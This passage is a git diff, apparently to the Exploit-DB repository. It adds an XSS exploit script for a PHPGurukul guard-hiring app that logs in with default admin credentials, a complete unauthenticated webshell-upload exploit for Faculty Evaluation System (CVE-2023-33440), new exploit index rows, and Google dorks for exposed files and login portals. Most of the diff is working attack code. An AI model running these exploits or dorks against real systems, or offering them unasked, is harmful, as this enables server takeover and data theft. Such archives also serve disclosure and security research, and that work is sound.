PRODUCT : PHPGURUKUL" + Fore.RESET) +print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET) +print(Fore.YELLOW +"######################################################################" + Fore.RESET) + +print() +print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET) +print() + + +# NAVIGATING TO ADMIN LOGIN PAGE +Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP +print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) +print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET) +print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET) + +Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''} + +headers = { + 'Content-Type': 'application/x-www-form-urlencoded', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', + 'Referer': 'http://localhost/osghs/admin/login.php', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'en-US,en;q=0.9', + 'Connection': 'close', + 'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc', + 'Sec-Fetch-Site': 'same-origin', + 'Sec-Fetch-Mode': 'navigate', + 'Sec-Fetch-User': '?1', + 'Sec-Fetch-Dest': 'document' +} + +response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials) +if response.status_code == 200: + location = re.findall(r'document.location =\'(.*?)\'',response.text) + if location: + print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET) + print(Fore.GREEN + "> Popup:"+ Fore.RESET,location ) + else: + print(Fore.GREEN + "> document.location not found"+ Fore.RESET) +else: + print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET) +print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) +print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET) + + +# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE +# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER +Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE + +# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD +# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=&search="" +payload = { + "adminname": "TESTAdmin", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE + "username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE + "mobilenumber": "8979555558", + "email": "admin@gmail.com", + "submit": "", +} + +# SENDING THE RESPONSE WITH POST REQUEST +response = requests.post(Website_url, headers=headers, data=payload) + +print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) +# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX +if response.status_code == 200: + scripts = re.findall(r'', response.text) + print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET) + print(Fore.GREEN+">"+Fore.RESET,scripts) +exploit.py +Displaying exploit.py. \ No newline at end of file diff --git a/exploits/php/webapps/51495.py b/exploits/php/webapps/51495.py new file mode 100755 index 000000000..c6182064c --- /dev/null +++ b/exploits/php/webapps/51495.py @@ -0,0 +1,115 @@ +# Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload +# Date: 5/29/2023 +# Author: Alex Gan +# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip +# Version: 1.0 +# Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6 +# CVE: CVE-2023-33440 +# References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440 +# https://www.exploit-db.com/exploits/49320 +# https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system +# +#!/usr/bin/env python3 +import os +import sys +import requests +import argparse +from bs4 import BeautifulSoup +from urllib.parse import urlparse +from requests.exceptions import ConnectionError, Timeout + +def get_args(): + parser = argparse.ArgumentParser() + parser.add_argument('-u', '--url', type=str, help='URL') + parser.add_argument('-p', '--payload', type=str, help='PHP webshell') + return parser.parse_args() + +def get_user_input(args): + if not (args.url): + args.url = input('Use the -u argument or Enter URL:') + if not (args.payload): + args.payload = input('Use the -p argument or Enter file path PHP webshell: ') + return args.url, args.payload + +def check_input_url(url): + parsed_url = urlparse(url) + if not parsed_url.scheme: + url = 'http://' + url + if parsed_url.path.endswith('/'): + url = url.rstrip('/') + return url + +def check_host_availability(url): + try: + response = requests.head(url=url + '/login.php') + if response.status_code == 200: + print("[+] Host is accessible") + else: + print("[-] Host is not accessible") + print(" Status code:", response.status_code) + sys.exit() + except (ConnectionError, Timeout) as e: + print("[-] Host is not accessible") + sys.exit() + except requests.exceptions.RequestException as e: + print("[-] Error:", e) + sys.exit() + +def make_request(url, method, files=None): + if method == 'GET': + response = requests.get(url) + elif method == 'POST': + response = requests.post(url, files=files) + else: + raise ValueError(f'Invalid HTTP method: {method}') + + if response.status_code == 200: + print('[+] Request successful') + return response.text + else: + print(f'[-] Error {response.status_code}: {response.text}') + return None + +def find_file(response_get, filename, find_url): + soup = BeautifulSoup(response_get, 'html.parser') + + links = soup.find_all('a') + found_files = [] + + for link in links: + file_upl = link.get('href') + if file_upl.endswith(filename): + found_files.append(file_upl) + + if found_files: + print(' File found:') + for file in found_files: + print('[*] ' + file) + + print(' Full URL of your file:') + for file_url in found_files: + print('[*] ' + find_url + file_url) + else: + print('[-] File not found') + +def main(): + args = get_args() + url, payload = get_user_input(args) + url = check_input_url(url) + check_host_availability(url) + + post_url = url + "/ajax.php?action=save_user" + get_url = url + "/assets/uploads/" + filename = os.path.basename(payload) + payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))] + + print(" Loading payload file") + make_request(post_url, 'POST', files=payload_file) + print(" Listing the uploads directory") + response_get = make_request(get_url, 'GET') + print(" Finding the downloaded payload file") + find_file(response_get, filename, get_url) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 89520951c..d0b87c36c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -2900,6 +2900,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,, +51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,, +51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,, +51496,exploits/go/webapps/51496.txt,"Pydio Cells 4.1.2 - Unauthorised Role Assignments",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32749,,,,, 7060,exploits/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,dos,hardware,,2008-11-07,,1,OSVDB-60243;CVE-2008-6605;OSVDB-49835,,,,, 2246,exploits/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,dos,hardware,,2006-08-21,,1,OSVDB-28171;CVE-2009-3962;CVE-2006-4523,,,,, 10182,exploits/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,dos,hardware,,2009-10-28,,1,,,,,,http://secunia.com/advisories/21583 @@ -10761,6 +10764,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31050,exploits/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",remote,multiple,,2008-01-28,2014-01-20,1,CVE-2008-0387;OSVDB-43187,,,,,https://www.securityfocus.com/bid/27403/info 29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",remote,multiple,,2007-03-06,2013-11-26,1,CVE-2007-1947;OSVDB-34122,,,,,https://www.securityfocus.com/bid/23349/info 37851,exploits/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",remote,multiple,,2015-08-19,2015-08-19,1,CVE-2015-5116,,,,,https://code.google.com/p/google-security-research/issues/detail?id=354&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id +51493,exploits/multiple/remote/51493.rb,"Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)",2023-05-31,"Ege Balci",remote,multiple,,2023-05-31,2023-05-31,0,CVE-2018-8065,,,,, 34500,exploits/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,remote,multiple,,2010-08-19,2014-09-01,1,CVE-2010-3202;OSVDB-67969,,,,,https://www.securityfocus.com/bid/42556/info 19223,exploits/multiple/remote/19223.txt,"FloosieTek FTGate 2.1 - Web File Access",1999-05-25,Marc,remote,multiple,,1999-05-25,2012-06-16,1,CVE-1999-0887;OSVDB-1137,,,,,https://www.securityfocus.com/bid/280/info 28209,exploits/multiple/remote/28209.txt,"FLV Players 8 - 'player.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28643,,,,,https://www.securityfocus.com/bid/18954/info @@ -11940,6 +11944,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49830,exploits/multiple/webapps/49830.js,"Moeditor 0.2.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,, 49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,,2020-12-03,2020-12-03,0,,,,,, 49582,exploits/multiple/webapps/49582.txt,"Monica 2.19.1 - 'last_name' Stored XSS",2021-02-23,BouSalman,webapps,multiple,,2021-02-23,2021-02-23,0,CVE-2021-27370,,,,, +51499,exploits/multiple/webapps/51499.txt,"MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)",2023-05-31,tmrswrr,webapps,multiple,,2023-05-31,2023-05-31,0,,,,,, 50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",2021-11-12,"Shain Lakin",webapps,multiple,,2021-11-12,2021-11-12,0,,,,,, 9898,exploits/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",webapps,multiple,,2009-10-28,,1,OSVDB-59579,,,,, 50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",2021-10-19,"RedTeam Pentesting GmbH",webapps,multiple,,2021-10-19,2021-10-19,0,CVE-2021-42566;CVE-2021-42565,,,,, @@ -18154,6 +18159,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsimple-invoice-master.zip, 12521,exploits/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,ALTBTA,webapps,php,,2010-05-05,,0,OSVDB-64382;OSVDB-64381;OSVDB-64380;OSVDB-64379;OSVDB-64378;OSVDB-64377;OSVDB-64376;OSVDB-64375,,,,, 49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,,2020-12-22,2020-12-22,0,,,,,, +51495,exploits/php/webapps/51495.py,"Faculty Evaluation System 1.0 - Unauthenticated File Upload",2023-05-31,URGAN,webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-33440,,,,, 10230,exploits/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,webapps,php,,2009-11-24,,1,,,,,, 43072,exploits/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15987,,,,, 4712,exploits/php/webapps/4712.txt,"falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting",2007-12-10,MhZ91,webapps,php,,2007-12-09,2016-10-20,1,OSVDB-40988;CVE-2007-6490;OSVDB-40987;OSVDB-40986;CVE-2007-6489;OSVDB-40985;CVE-2007-6488,,,,http://www.exploit-db.comfalcon143.tar.gz, @@ -24727,6 +24733,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48419,exploits/php/webapps/48419.txt,"Online Scheduling System 1.0 - 'username' SQL Injection",2020-05-05,"Saurav Shukla",webapps,php,,2020-05-05,2020-05-05,0,,,,,, 48409,exploits/php/webapps/48409.txt,"Online Scheduling System 1.0 - Authentication Bypass",2020-05-01,boku,webapps,php,,2020-05-01,2020-05-01,0,,,,,, 48403,exploits/php/webapps/48403.txt,"Online Scheduling System 1.0 - Persistent Cross-Site Scripting",2020-05-01,boku,webapps,php,,2020-05-01,2020-05-01,0,,,,,, +51494,exploits/php/webapps/51494.py,"Online Security Guards Hiring System 1.0 - Reflected XSS",2023-05-31,"AFFAN AHMED",webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-0527,,,,, 48819,exploits/php/webapps/48819.txt,"Online Shop Project 1.0 - 'p' SQL Injection",2020-09-21,Augkim,webapps,php,,2020-09-21,2020-09-21,0,,,,,, 48771,exploits/php/webapps/48771.txt,"Online Shopping Alphaware 1.0 - 'id' SQL Injection",2020-08-28,"Moaaz Taha",webapps,php,,2020-08-28,2020-08-28,0,,,,,, 48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,,2020-07-30,2020-07-30,0,,,,,, @@ -24736,7 +24743,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,, 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,, 48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,, -51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,, +51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-05-31,1,,,,,, 35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info 44719,exploits/php/webapps/44719.txt,"Online Store System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,, 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,,2020-06-23,2020-06-23,0,,,,,, @@ -28747,6 +28754,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,, 48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,, 51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,, +51490,exploits/php/webapps/51490.txt,"Rukovoditel 3.3.1 - CSV injection",2023-05-31,"Mirabbas Ağalarov",webapps,php,,2023-05-31,2023-05-31,0,,,,,, 51322,exploits/php/webapps/51322.txt,"Rukovoditel 3.3.1 - Remote Code Execution (RCE)",2023-04-07,"Mirabbas Ağalarov",webapps,php,,2023-04-07,2023-04-07,0,,,,,, 46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/ 45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip, @@ -29034,6 +29042,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 7111,exploits/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php,,2008-11-12,,1,OSVDB-49960;CVE-2008-6944;CVE-2008-6943;CVE-2008-6942,,,,, 7110,exploits/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php,,2008-11-12,,1,OSVDB-49960;CVE-2008-6944;CVE-2008-6943;CVE-2008-6942,,,,, 7112,exploits/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php,,2008-11-12,,1,OSVDB-49960;CVE-2008-6944;CVE-2008-6943;CVE-2008-6942,,,,, +51491,exploits/php/webapps/51491.txt,"SCRMS 2023-05-27 1.0 - Multiple SQL Injection",2023-05-31,nu11secur1ty,webapps,php,,2023-05-31,2023-05-31,0,,,,,, 37548,exploits/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 - Arbitrary File Upload",2012-07-30,"Mario Ceballos",webapps,php,,2012-07-30,2015-07-10,1,CVE-2012-2627;OSVDB-84319,,,,,https://www.securityfocus.com/bid/54726/info 37547,exploits/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",webapps,php,,2012-07-30,2015-07-10,1,CVE-2012-3848;OSVDB-84321,,,,,https://www.securityfocus.com/bid/54725/info 27724,exploits/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",webapps,php,,2006-04-21,2013-08-20,1,CVE-2006-1995;OSVDB-24889,,,,,https://www.securityfocus.com/bid/17649/info @@ -29125,7 +29134,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,, 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip, 10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,, -51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-24,0,,,,,, +51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-31,1,CVE-2023-2769,,,,, 4089,exploits/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,webapps,php,,2007-06-20,2016-10-05,1,OSVDB-36324;CVE-2007-3358,,,,http://www.exploit-db.comserweb-0.9.4.tar.gz, 4696,exploits/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,webapps,php,,2007-12-05,,1,OSVDB-39220;CVE-2007-6290;OSVDB-39219;CVE-2007-6289;OSVDB-39218;OSVDB-39217,,,,, 9284,exploits/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,webapps,php,,2009-07-26,,1,,,,,, @@ -31084,6 +31093,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80,2016-02-04,2016-02-04,1,,,,,http://www.exploit-db.comulicms-9.8.1-snowfall-full.zip, 51434,exploits/php/webapps/51434.txt,"Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,, 51435,exploits/php/webapps/51435.txt,"Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-09,1,,,,,, +51433,exploits/php/webapps/51433.py,"Ulicms-2023.1-sniffing-vicuna - Privilege escalation",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-31,0,,,,,, 11048,exploits/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - 'ladder.php' SQL Injection",2010-01-07,Sora,webapps,php,,2010-01-06,,1,,,,,, 11385,exploits/php/webapps/11385.txt,"ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting",2010-02-10,"Sioma Labs",webapps,php,,2010-02-09,,1,,,,,, 34888,exploits/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,webapps,php,,2009-08-19,2016-10-10,1,CVE-2009-3202;OSVDB-57176,,,,,https://www.securityfocus.com/bid/44273/info @@ -31142,6 +31152,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50022,exploits/php/webapps/50022.txt,"Unified Office Total Connect Now 1.0 - 'data' SQL Injection",2021-06-17,"Ajaikumar Nadar",webapps,php,,2021-06-17,2021-06-17,0,,,,,, 3106,exploits/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx' SQL Injection",2007-01-09,ajann,webapps,php,,2007-01-08,,1,OSVDB-32927;CVE-2007-0226,,,,, 37216,exploits/php/webapps/37216.txt,"Unijimpe Captcha - 'captchademo.php' Cross-Site Scripting",2012-05-16,"Daniel Godoy",webapps,php,,2012-05-16,2015-06-06,1,CVE-2012-2914;OSVDB-82267,,,,,https://www.securityfocus.com/bid/53585/info +51492,exploits/php/webapps/51492.txt,"unilogies/bumsys v1.0.3 beta - Unrestricted File Upload",2023-05-31,"AFFAN AHMED",webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-0455,,,,, 29504,exploits/php/webapps/29504.txt,"Unique Ads - 'Banner.php' SQL Injection",2007-01-22,Linux_Drox,webapps,php,,2007-01-22,2013-11-08,1,,,,,,https://www.securityfocus.com/bid/22164/info 48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,,2020-03-04,2020-03-04,0,,,,,, 46389,exploits/php/webapps/46389.py,"UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload",2019-02-15,"Mohammad Danish",webapps,php,80,2019-02-15,2019-02-15,0,,,,,http://www.exploit-db.comlaravel-filemanager-2.0.0-alpha7.tar.gz, diff --git a/ghdb.xml b/ghdb.xml index b69e51bce..d4066bf5a 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -33661,6 +33661,21 @@ Aamir Rehman 2018-02-14 Aamir Rehman + + 8200 + https://www.exploit-db.com/ghdb/8200 + Files Containing Juicy Info + allintitle:"macOS Server" site:.edu + # Google Dork: allintitle:"macOS Server" site:.edu +# Files Containing Juicy Info +# Date:31/05/2023 +# Exploit Author: Thomas Heverin + allintitle:"macOS Server" site:.edu + https://www.google.com/search?q=allintitle:"macOS Server" site:.edu + + 2023-05-31 + Thomas Heverin + 8097 https://www.exploit-db.com/ghdb/8097 @@ -44667,6 +44682,22 @@ Author: Abhi Chitkara 2022-06-17 Danish Eqbal + + 8198 + https://www.exploit-db.com/ghdb/8198 + Files Containing Juicy Info + intitle:"index of" "private.properties" + # Google Dork: intitle:"index of" "private.properties" +# Files Containing Juicy Info +# Date:31/05/2023 +# Exploit Author: Praharsh Kumar Singh + + intitle:"index of" "private.properties" + https://www.google.com/search?q=intitle:"index of" "private.properties" + + 2023-05-31 + Praharsh Kumar Singh + 7957 https://www.exploit-db.com/ghdb/7957 @@ -44713,6 +44744,22 @@ Author: Abhi Chitkara 2021-09-24 J. Igor Melo + + 8197 + https://www.exploit-db.com/ghdb/8197 + Files Containing Juicy Info + intitle:"index of" "profiler" + # Google Dork: intitle:"index of" "profiler" +# Files Containing Juicy Info +# Date:31/05/2023 +# Exploit Author: Praharsh Kumar Singh + + intitle:"index of" "profiler" + https://www.google.com/search?q=intitle:"index of" "profiler" + + 2023-05-31 + Praharsh Kumar Singh + 7710 https://www.exploit-db.com/ghdb/7710 @@ -47800,6 +47847,21 @@ Sachin 2020-07-07 Sachin Kattimani + + 8204 + https://www.exploit-db.com/ghdb/8204 + Files Containing Juicy Info + intitle:"SCM Manager" intext:1.60 + # Google Dork: intitle:"SCM Manager" intext:1.60 +# Files Containing Juicy Info +# Date:31/05/2023 +# Exploit Author: Alexandros Pappas + intitle:"SCM Manager" intext:1.60 + https://www.google.com/search?q=intitle:"SCM Manager" intext:1.60 + + 2023-05-31 + Alexandros Pappas + 8190 https://www.exploit-db.com/ghdb/8190 @@ -53626,6 +53688,21 @@ passwords..etc 2013-08-08 anonymous + + 8203 + https://www.exploit-db.com/ghdb/8203 + Files Containing Juicy Info + inurl:wp-content/uploads/sites + # Google Dork: inurl:wp-content/uploads/sites +# Files Containing Juicy Info +# Date:31/05/2023 +# Exploit Author: Stuart Steenberg + inurl:wp-content/uploads/sites + https://www.google.com/search?q=inurl:wp-content/uploads/sites + + 2023-05-31 + Stuart Steenberg + 8187 https://www.exploit-db.com/ghdb/8187 @@ -88122,6 +88199,36 @@ default: admin // adminadmin 2021-11-12 Naveen Venugopal + + 8202 + https://www.exploit-db.com/ghdb/8202 + Pages Containing Login Portals + Re: inurl:"/admin" intitle:"adminlogin" + # Google Dork: inurl:"/admin" intitle:"adminlogin" +# Pages Containing Login Portals +# Date:31/05/2023 +# Exploit Author: Ishak Hasan Sabbir + Re: inurl:"/admin" intitle:"adminlogin" + https://www.google.com/search?q=Re: inurl:"/admin" intitle:"adminlogin" + + 2023-05-31 + Ishak Hasan Sabbir + + + 8201 + https://www.exploit-db.com/ghdb/8201 + Pages Containing Login Portals + Re: inurl:"/user" intitle:"userlogin" + # Google Dork: inurl:"/user" intitle:"userlogin" +# Pages Containing Login Portals +# Date:31/05/2023 +# Exploit Author: Ishak Hasan Sabbir + Re: inurl:"/user" intitle:"userlogin" + https://www.google.com/search?q=Re: inurl:"/user" intitle:"userlogin" + + 2023-05-31 + Ishak Hasan Sabbir + 5619 https://www.exploit-db.com/ghdb/5619 @@ -100793,6 +100900,21 @@ Discovered By: Kevin Randall 2019-04-03 Kevin Randall + + 8199 + https://www.exploit-db.com/ghdb/8199 + Various Online Devices + 